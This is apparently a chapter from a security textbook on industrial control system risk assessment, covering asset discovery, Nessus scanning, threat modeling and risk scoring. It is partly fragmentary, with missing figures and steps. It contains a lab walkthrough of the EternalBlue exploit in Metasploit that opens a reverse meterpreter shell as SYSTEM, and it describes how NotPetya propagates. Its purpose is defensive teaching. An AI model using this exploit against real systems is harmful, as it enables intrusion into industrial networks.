Chapter 15 Industrial Control System Risk Assessments
Chapter 15 Industrial Control System Risk Assessments
Industrial Control
System Risk
Assessments
In this chapter, we are going to get into the details of Industrial Control System (ICS)
risk assessments. We will start the chapter off with a short discussion of how objectives
and approaches differ between Information Technology (IT) and ICS cyber attacks.
After that, we will explore the different approaches and techniques behind IT system
risk assessments before we look at the added complexity of conducting ICS-specific
assessments. At the end of this chapter, you should have a good understanding of what is
involved in conducting ICS-specific risk assessments.
We will cover the following topics in this chapter:
• Understanding the attack stages and ultimate objectives of ICS cyber attacks
• Risk assessments
• Asset identification
• System characterization
2 Industrial Control System Risk Assessments
• Vulnerability identification
• Threat modeling
• Risk calculation
• Risk mitigation prioritization
Figure 15.1 – The two phases of the ICS cyber kill chain
Risk assessments 3
Stage 1 involves gaining access to the ICS network in any way possible, which typically
means gaining a foothold in the enterprise network and pivoting into the industrial
network from there, being the two main objectives of the first stage of the ICS attack
scenario. Stage 1 of the attack needs to be completed successfully before the second
stage can begin. Stage 2 involves the ICS exploitation part of the attack, where activities
necessary to achieve the ultimate attack objective are carried out. Attack objectives can
include stealing sensitive data, disrupting production, or something more sinister such as
causing physical damage to equipment. What all this means is that an ICS attack scenario
can involve several attacks and corresponding objectives, depending on the stage the ICS
attack is in. This scenario differs from a regular IT attack where the objective is achieved
by completing stage 1 activities or is part of stage 1 activities. The following example
illustrates this key difference between IT and OT/ICS cyberattacks:
Risk assessments
The business dictionary defines risk assessment as "The identification, evaluation, and
estimation of the levels of risks involved in a situation, their comparison against benchmarks
or standards, and determination of an acceptable level of risk." In other words, risk
assessments are about discovering all the things that can go wrong in a certain situation,
such as the setup of a system, and the likelihood that things will go wrong and what the
impact will be when things do go wrong.
4 Industrial Control System Risk Assessments
Given this explanation, let's look at a definition of risk. The authors of the book Hacking
exposed – Industrial Control Systems gave one of the most complete descriptions of risk
that I have encountered:
"Risk is the likelihood that a threat source will cause a threat event, by means of a threat
vector, due to a potential vulnerability in a target, and what the resulting consequence and
impact will be."
Let's look closer at this description:
• A threat source is the initiator of the exploit, the attacker or threat actor.
• A threat event is an act of exploiting a vulnerability, or an attack on the system
under consideration (SUC).
• A threat vector is the avenue of attack or the delivery method of the exploit, such
as using an infected thumb drive or using a phishing email to deliver a malicious
payload.
• A vulnerability is a flaw in the SUC, such as a misconfigured service, an easily
guessed password, or a buffer overflow programming error in an application.
• Likelihood is the chance of the vulnerability found becoming a threat event.
• A target is the SUC.
• A consequence is the direct result of a successful threat event, such as the crashing
of a service or the installation of a malicious program.
• The impact is the effect on the operations, image, or financial welfare of the victim
company.
So, a risk assessment will show you what vulnerabilities lurk in the SUC, what the chances
are of these vulnerabilities being exploited, and what the results are for the system and
the company that owns the system. The result of a risk assessment is a risk score for a
discovered vulnerability. The score takes into consideration all the factors that define
risk with the following equation:
Risk assessments 5
There is a lot of difference in the quality of risk assessments when it comes to the
calculation of the likelihood. The likelihood score gives insight into the chances that
the discovered vulnerability will be exploited and cause a threat event. This is where
the different parts and methods of a risk assessment come into play. From a high-level
perspective, the following three sets of activities should take place in a risk assessment:
• These activities involve the discovery of all the assets of the SUC, determining their
criticality and the asset value, which is used for impact calculation.
• The outcome of this step is a list of potential targets.
Asset identification and system characterization 7
• This step involves discovering any potential vulnerabilities within the discovered
assets and their associated CVSS scores for the severity calculation.
• This step involves using thread modeling techniques to add threat vectors, threat
events, threat sources, and threat events information.
• This step also assesses the likelihood and consequence of a compromise.
• The outcome of this step will be a listing of risk scenarios, made relevant and
actionable for the SUC.
• This step involves assessing the total impact of a threat event for each discovered
target's vulnerability.
• Combining all the discovered information, this step calculates the risk score.
• The outcome of this step will be an actionable risk scoring per vulnerability that
helps strategize remediation efforts.
Note
Where does a gap analysis fit into all this? A gap analysis is often mistaken for
a risk assessment; a gap analysis only looks for all the mitigation controls in
place for the SUC. It then compares those controls to some predefined list of
recommended controls. The difference between the two is the discovered gaps.
A gap analysis doesn't take any likelihood, impact, or severity calculation into
account. It just shows whether the system is using generally recommended
mitigation controls. Gap analyses are often used to comply with regulatory
requirements. They do not add any real security. A gap analysis should be part
of a risk assessment; it should not be considered the risk assessment.
Asset identification
The asset identification process will typically start with the reviewing of existing
documentation such as IP and asset lists, software and hardware inventory
documentation, and asset management systems in order to compile a list of assets and
their IP addresses. The objective here is to find all the assets of the SUC. If performed
cautiously and during production downtime, the discovery of additional assets or
verification of assets found with decimation review can be accomplished with network
scanning tools, by running ping sweeps and ARP scans. To illustrate these two scan
methods, consider the following scan example, performed with our trusted friend NMAP.
The following NMAP command will run a ping sweep (-sP) of the 172.20.7.0/24
subnet, which comes down to sending an ICMP PING request to the range of addresses
we specified:
If we are interested in only showing discovered IP addresses from the scan, we can filter
out just the IP addresses by piping the NMAP results through awk as shown in the
following snippet (awk is a domain-specific language designed for text processing and
is typically used as a data extraction and reporting tool and is a standard feature of most
Unix/Linux OSes):
Looking at the command, we run an NMAP ping sweep scan (nmap -sP) with the
output displayed as a greppable string (-oG -) and pipe the results (|) into awk, which
will display only the results of IP addresses that are up (awk'/Up$/{print $2}').
Additionally, we could redirect (>) the output of this command into a file, so we keep a
record of all the IP addresses we found for later use:
Although have run many of these scans on a variety of industrial networks and have
never seen any serious issues resulting from doing so, I am still going to caution you
to be very careful when performing network scans in the ICS environment. Devices
on OT or ICS networks are often more sensitive to active scanning techniques. Some
older devices can buckle from a single ping packet and many OT devices will suffer
performance degradation when more intense port scanning is performed on the network.
Compounding the issue is the fact that the uptime requirements for OT/ICS network
and attached devices are many times higher than for regular IT networks. Where on a
regular IT network it is okay to restart a Domain Name Service (DNS) or Dynamic
Host Configuration Protocol (DHCP) server, on OT networks this kind of action can
be disastrous. Processes relying on and running over OT networks often include many
devices, and most of the time if one of those devices fails, the entire process fails. To make
things worse, ICS failures often result in safety-related incidents, and lives might be on the
line in certain situations.
Asset identification and system characterization 11
For these reasons, it is not recommended to do any type of active scanning on live or
in-production OT/ICS networks. Instead, passive scanning techniques and tools should be
considered. One such tool is p0f (https://lcamtuf.coredump.cx/p0f3/). p0f
does not send out any traffic onto the network it sits on but instead uses network packet
capturing (sniffing) technology to discover live systems on the network. p0f is only as
effective as the traffic it sees, so if it cannot capture packets sent from a system, it will not
report on the system. The following is an example output from the p0f command, piped
through awk to filter out IP addresses only:
Note
The preceding example only shows a single IP because that is the only one on
the network segment that this computer is attached to.
The following figure gives an example of an assets list with IP address, OS/firmware/
software versions and revisions, and device details:
Note
Creating a comma-separated list with only the IP addresses makes for a handy
import in most automated scanning tools later in the process.
Now that we have discovered our assets of concern, we will continue with the
characterization of the system they are part of.
System characterization
Now that we have a list of target assets, we need to characterize the discovered assets,
identify the systems they belong to, and identify functional aspects such as installed
software and any subsystems that might be present. We also need to evaluate the
importance of the asset or system to the overall process and other characterizing details
such as when maintenance was last performed or when the last system failure was –
anything that will help the risk assessment in evaluating the impact and likelihood of the
asset or system being compromised or failing.
During this process, it helps to think of issues such as the time it would take to rebuild
a system from scratch and the effect on upstream or downstream equipment in the case
of system or asset failure. Figuring out the maximum acceptable time for a system to be
down before the entire process must be stopped (known as the recovery time objective or
RTO) helps as well. In the end, we need to get a clear understanding of the function and
importance of the asset or system in the overall (production) process.
The data that needs to be gathered during these activities comes from asset owner
interviews, documentation review, round table exercises with production and engineering
personnel, and discussions with supervisors and managers of the production line.
Vulnerability identification and threat modeling 13
After characterizing the activities, the following is the updated asset list for the chapter's
example assessment:
Threat intelligence is general threat information that is correlated and processed in a way
that means it becomes of operational value to the organization and SUC it was gathered
for. Threat intelligence has actionable value to a company because the non-relevant threats
and information are stripped and eliminated. The threat modeling process will cut out
non-relevant information and, when done correctly, will help provide a more streamlined
and efficient mitigation process later in the assessment process, giving a better return
on investment for cybersecurity spending. At a high level, threat modeling will correlate
up-to-date threat information with the vulnerabilities discovered for the list of targets
found in the previous step.
The activities in this step can be divided as follows:
Discovering vulnerabilities
The first activity in this step is discovering all the vulnerabilities that are lurking in the
SUC. There are two main methods in accomplishing this task, comparison and scanning.
The comparison method takes all the running software, firmware, and OS versions and
compares those to online vulnerability databases, searching for known vulnerabilities.
Some resources to find vulnerabilities include the following:
• https://nvd.nist.gov
• https://cve.mitre.org
• https://us-cert.cisa.gov/ics
• http://www.securityfocus.com
• http://www.exploit-db.com
It must be said that this method is very labor-intensive but carries little to no risk to the
ICS network as no network packets need to be sent and no other traffic needs to be added
to the ICS network to gather the information. The second method involves running a
vulnerability scan with an automated scanning tool such as Nessus (https://www.
tenable.com/products/nessus/nessus-professional) or OpenVAS
(http://www.openvas.org/). The scanning method is faster and much less labor-
intensive but will introduce lots of traffic to the ICS network and, depending on the type
of scan, can have negative effects on ICS devices.
Vulnerability identification and threat modeling 15
With the potential of adverse effects on ICS equipment, it is advised to run any type of
active scanning on a test setup or an approximation of the ICS network. If you are lucky
enough to have a test environment or a development setup in your ICS environment,
scanning and probing should be performed in that environment. Most of the time, such
a network setup will not be present, and an approximation must be created. This involves
taking a sample of every model, type, and firmware and software revision that runs on the
production network and getting a spare or extra setup on a test network. OSes and certain
network devices can be virtualized; ICS devices such as controllers and HMIs might
be found in the spares room of the plant. This will effectively create a duplicate of the
production network that can be tested, probed, scanned, and interrogated at will.
This way, you can take a production network like the one shown here:
Figure 15.6 – ICS network approximation – allows safe testing and probing
Let's look at the steps involved in performing a Nessus scan. Follow these instructions to
scan your (lab) environment with the free version of the Nessus vulnerability scanner:
1. To follow along with the exercise, you will need to install the latest Kali Linux
version of the Nessus scanner, downloaded from https://www.tenable.com/
downloads/nessus?loginAttempted=true, and sign up for a free (Nessus
Essentials) license from https://www.tenable.com/products/nessus/
activation-code.
2. Once the Nessus scanner package is downloaded, open a terminal on the Kali
Linux VM and run the following command:
root@KVM01010101:~/Downloads# dpkg -i Nessus-6.10.8-
debian6_amd64.deb
Selecting previously unselected package nessus.
(Reading database ... 339085 files and directories
currently installed.)
Preparing to unpack Nessus-6.10.8-debian6_amd64.deb ...
Unpacking nessus (6.10.8) ...
Vulnerability identification and threat modeling 17
3. This will install the Nessus scanner and take care of any additional requirements
and dependencies. Once the scanner is done installing, run the following command,
as indicated by the installer, to finalize the installation and start the Nessus scanner
service:
root@KVM01010101:~/Downloads# service nessusd start
4. With the scanner service running, open Firefox and navigate to the indicated URL
(note that the URL might be different for your setup):
https://<IP ADDRESS OF KALI>:8834/
18 Industrial Control System Risk Assessments
5. As part of the initial setup, Nessus will guide you through the process of licensing
the scanner and setting up an administrative user (choose something memorable).
Next, the initial setup process will download updated scanner plugins and direct
you to the initial scanner page:
7. The next screen requires us to enter some basic information as a name for the new
scan, where to store it, and what targets to scan:
For this simple example vulnerability scan, we will leave all other settings at their
default values and launch the scan:
10. On the Scan Details page, we can see results for the hosts that we specified to get
scanned through the hosts-ips.txt file:
12. And Nessus will even give us remediation suggestions for the discovered
vulnerabilities, shown under the Remediations tab:
1. We will be using Metasploit from our Kali Linux machine. Log in to the Kali VM,
open a terminal, and run the msfconsole command:
root@KVM01010101:~# msfconsole
=[ metasploit v4.14.25-dev ]
+ -- --=[ 1659 exploits – 950 auxiliary – 293 post ]
+ -- --=[ 486 payloads – 40 encoders – 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp
]
Matching Modules
================
Name Disclosure
Date Rank Description
---- ----
auxiliary/scanner/smb/smb_ms17_010
normal MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14
average MS17-010 EternalBlue SMB Remote Windows Kernel
Pool Corruption
4. Next, we need to set a payload for the exploit to use. We will be using the
meterpreter payload. meterpreter is a Metasploit attack payload that
provides an interactive shell from which an attacker can explore the target machine
and execute code. meterpreter is deployed using in-memory DLL injection. As a
result, meterpreter resides entirely in memory and writes nothing to disk:
msf exploit(ms17_010_eternalblue) > set payload windows/
x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
5. At this point, we need to set the various options needed for exploit and
payload to work properly. Look at the current options with show options:
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service
Packs
6. The only two missing required options are LHOST and RHOST. We need to specify
the localhost IP address (LHOST):
msf exploit(ms17_010_eternalblue) > set LHOST
192.168.1.222
LHOST => 192.168.1.222
9. The exploit succeeded and we now have a meterpreter (chosen payload) session
with the target (192.168.1.200), as the almighty SYSTEM user (the root account
for Windows):
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
On a sparsely updated network, as most ICS environments tend to be, where legacy
systems such as Windows XP and even 2000 are still present, this exploit is extremely
successful and can potentially cause a lot of damage. As a matter of fact, I can still vividly
recall a customer engagement where they were heavily hit by the NotPetya malware.
Initially believed to be a ransomware trying to extort victims, it was later discovered
that the NotPetya malware was a wiper, with the purpose of doing as much damage as
quickly as possible. What makes NotPetya extra dangerous is the fact that it not only uses
the SMBv1 vulnerability as a propagation method but also uses two other legitimate
remote system connection methods. NotPetya can use a well-known system utility
called PsExec.exe, created by Sysinternals (https://docs.microsoft.com/
en-us/sysinternals/downloads/psexec), for connecting to remote systems
with credentials, obtained from memory on the compromised system with functionality
such as MimiKatz. The third method of propagation is achieved by using the Windows
Management Instrumentation Command (WMIC) interface. With the use of wmic.
exe, NotPetya can copy and execute a copy of itself to a remote computer, by using the
credentials obtained from memory. All in all, the victim can lose control of the ICSes in
half of their plants and the malware can interrupt production for almost a week. With
wiped systems, there are only two options to recover: either from a recent backup where
there is one available or from scratch where there is not.
At this point, we have a list of assets and their discovered vulnerabilities; time to start
thinking of all the ways those vulnerabilities on the assets can be exploited.
Vulnerability identification and threat modeling 29
Threat modeling
With assets and corresponding vulnerabilities discovered for the SUC, the next activity in
the risk assessment process is to create risk scenarios using threat modeling techniques.
In a way, creating risk scenarios is about trying to predict where a threat is likely going
to strike. This part of the ICS risk assessment differs the most from the regular IT risk
assessment. This is where we will bring together vulnerabilities for IT and OT assets and
decide on the likelihood that they will be exploited based on the (physical) environment
they are in and correlate the impact of a potential exploit to the production process and
the safety of the environment the SUC operates in.
At this point, it is important to know the system or process being evaluated very well.
Creating risk scenarios starts with combining information such as threat sources and
threat vectors to create possible threat events for the vulnerabilities found. For a threat
event to be feasible, the following elements must be present: a threat source to carry out
the event, a threat vector to exploit the vulnerability, and a target with a vulnerability. The
following figure conceptualizes a threat event:
In general, a threat source can be anything capable of carrying out the threat event, from
internal threat sources such as employees and contractors to external threat sources such
as former employees, hackers, national governments, and terrorists. For a more in-depth
explanation of possible threat sources, refer to the ISC-CERT article here: https://
ics-cert.us-cert.gov/content/cyber-threat-source-descriptions.
A good starting list when considering possible threat sources is the list included in the
NIST SP800-82r2 documentation (https://csrc.nist.gov/publications/
detail/sp/800-82/rev-2/final). This resource gives us adversarial and
accidental threat source examples:
• Business network
• ICS network
• Internet
• WAN
• ICSes and devices
• Same-subnet computer systems
• PC and ICS applications
32 Industrial Control System Risk Assessments
• Physical access
• People (via social engineering)
• The supply chain
• Remote access
• (Spear) phishing
• Mobile devices
At this point, we start combining all possible threat sources that could exploit the
vulnerability in our target with all possible threat vectors, keeping in mind the
feasibility of the threat sources and vectors. The following is an example threat scenario
for a vulnerability in Siemens S7-400 PLC, discovered by passively comparing the
running firmware revision to the vulnerability database on https://search.
us-cert.gov/search?utf8=%E2%9C%93&affiliate=us-cert&sort_
by=&query=siemens+s7-300%2F400+6.1:
Look at the details for the first returned result, the vulnerability under ICSA-16-348-
05/CVE-2016-9158:
We can now create the threat event for Siemens PLC, taking into consideration the
information we have found so far:
To point out a highly efficient assessment technique, let's extend the chapter's assessment
example to include the Windows 7 workstation with the MS17-010 vulnerability that we
discovered and pointed out in the previous section:
During the asset identification and characterization step, let's say it was discovered
that the Windows 7 workstation was connected to both the business network and the
industrial network (dual-homed) and had, among other software, Siemens Step 7
installed. Because of this, the engineering workstation computer WS100-West now
becomes a threat vector for all Siemens PLCs within the industrial network segment the
computer is connected to.
Vulnerability identification and threat modeling 35
In the case of the vulnerable Siemens S7 PLC described earlier, the workstation is not
only a threat vector but because of the opportunity to pivot from the business network
into the industrial network by means of the vulnerability present on the WS100-West
workstation, that computer now extends the threat source and threat vector possibilities
for the vulnerability of the Siemens PLC. In other words, because the workstation can
be exploited on the business network and used for pivoting into the industrial network,
threat actors (sources) can now potentially exploit the Siemens PLC whereas it would
normally have been protected by network segmentation from those attack sources and
vectors.
Correlating known vulnerable systems to other parts of the SUC allows for creating more
realistic threat events, adding actionable value to the risk scenarios built from those threat
events. Actionable and relevant risk scenarios help strategize mitigation efforts and allow
for the efficient use of a tight security budget.
The following figure illustrates a risk scenario:
Creating risk scenarios from threat events is done by adding plausible attacker motives/
objectives and the possible consequences when a threat event is realized. Plausible
objectives and consequences are highly dependent on the industry sector the ICS is in,
the business objectives, and the environmental situation of the ICS. The following lists are
starting points for possible objectives and consequences, gathered from online sources
such as https://www.msec.be/verboten/presentaties/presentatie_
gc4_attack_targets.pdf. The lists are sorted by asset and system type. These lists
should be adjusted to and rationalized for the industry sector your ICS is in, the business
objectives of the ICS owner, and the surrounding environment of the ICS. Information
such as the geographical location of the ICS and the placement of the ICS network within
the overall company network architecture are relevant factors that could dictate whether
theorized threat events are plausible.
The following table shows a starting list of possible objectives per asset type:
Vulnerability identification and threat modeling 37
38 Industrial Control System Risk Assessments
The following table shows a starting list of possible ICS consequences per compromised
asset type:
Vulnerability identification and threat modeling 39
40 Industrial Control System Risk Assessments
Vulnerability identification and threat modeling 41
Note
Another great resource that can help with threat modeling is the ICS adversary
Tactics, Tools, and Procedures (TTPs) described at MITRE Attack Framework
for Industrial Control Systems – https://collaborate.mitre.org/
attackics/index.php/Main_Page.
42 Industrial Control System Risk Assessments
By adding the objectives and consequences to this chapter's example threat events, we can
create the following risk scenario:
Risk calculation and mitigation prioritization 43
We just created a risk scenario matrix where we correlated various findings in a way that
allows us to assess the discovered vulnerabilities quickly and accurately around an asset or
system. Next, we are going to assign some values to the risks we have uncovered to create
a comparative scoring that will allow us to effectively prioritize mitigation efforts.
This gives the following risk score calculation for the Siemens S7-400 PLC vulnerability:
Figure 15.23 – Risk calculation for the Siemens S7-400 PLC vulnerability
The resulting score allows easy correlation between all discovered vulnerabilities. Because
we performed the assessment objectively and with the overall SUC in mind, the score that
is calculated is an unbiased, all-inclusive indicator of what asset or system of the process
indicates the most risk in the overall process. At this point, the assessment results can be
easily compared during mitigation strategies. A vulnerability resulting in a risk score of
eight will need more attention than one with a score of six.
44 Industrial Control System Risk Assessments
Summary
In this chapter, we looked at risk assessments in general and performed an example risk
assessment for an ICS environment. During the process, we discovered the assets in play,
their specifics, and their importance in the overall process (know what you have), and we
intelligently looked at all the possible ways things can go wrong with the discovered assets
(know what is wrong with what you have). By calculating a highly actionable risk scoring
for each discovered risk instance, we are now in a position to effectively spend our security
budget on controls that have the biggest impact, securing the assets we need the most.
By now, you should be well versed in the art of performing risk assessments for the ICS
environment. As with everything, practice makes perfect, but you now have a great
starting point.
In the next chapter, we will look at a different type of security assessment, the red team
versus blue team exercise.